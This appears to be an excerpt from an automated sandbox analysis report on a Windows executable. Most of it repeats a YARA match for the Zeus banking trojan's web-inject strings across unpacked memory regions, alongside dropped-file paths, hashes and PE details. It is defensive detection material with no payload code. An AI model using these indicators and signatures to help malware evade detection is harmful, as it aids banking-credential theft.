Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_014AEC006_2_014AEC00
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_014A7C106_2_014A7C10
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_014A5C306_2_014A5C30
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_01479F506_2_01479F50
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_014B17C06_2_014B17C0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_0147F7E06_2_0147F7E0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_014AF7906_2_014AF790
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_01473FA06_2_01473FA0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_014ADFA06_2_014ADFA0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_014A56506_2_014A5650
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_014B96136_2_014B9613
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_014B2EDD6_2_014B2EDD
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_014A06D06_2_014A06D0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_014AC6D06_2_014AC6D0
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeProcess token adjusted: SecurityJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6928 -s 756
Source: OjKmJJm2YT.exeStatic PE information: Number of sections : 13 > 10
Source: svchost.exe.0.drStatic PE information: Number of sections : 13 > 10
Source: OjKmJJm2YT.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 0.2.OjKmJJm2YT.exe.406400.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.13.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.883000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.41.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 24.2.nFjEHtbDTFjy.exe.d92000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 30.2.nFjEHtbDTFjy.exe.20d2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 5.2.nFjEHtbDTFjy.exe.632000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.3.OjKmJJm2YT.exe.841298.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 21.2.nFjEHtbDTFjy.exe.2172000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.883000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.38.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.2.OjKmJJm2YT.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 21.2.nFjEHtbDTFjy.exe.2440000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.19.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 6.2.nFjEHtbDTFjy.exe.14d0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.10.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.28.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 16.2.nFjEHtbDTFjy.exe.2ba0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 30.2.nFjEHtbDTFjy.exe.2480000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.34.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.35.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.3.OjKmJJm2YT.exe.83b298.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.38.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 32.2.nFjEHtbDTFjy.exe.32f0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 7.2.nFjEHtbDTFjy.exe.2dc0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 32.2.nFjEHtbDTFjy.exe.3042000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 34.2.nFjEHtbDTFjy.exe.2d82000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.888400.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.16.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.24.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 14.2.nFjEHtbDTFjy.exe.2a82000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.20.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.3.OjKmJJm2YT.exe.83b298.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.20.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.2bb0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.15.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.11.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
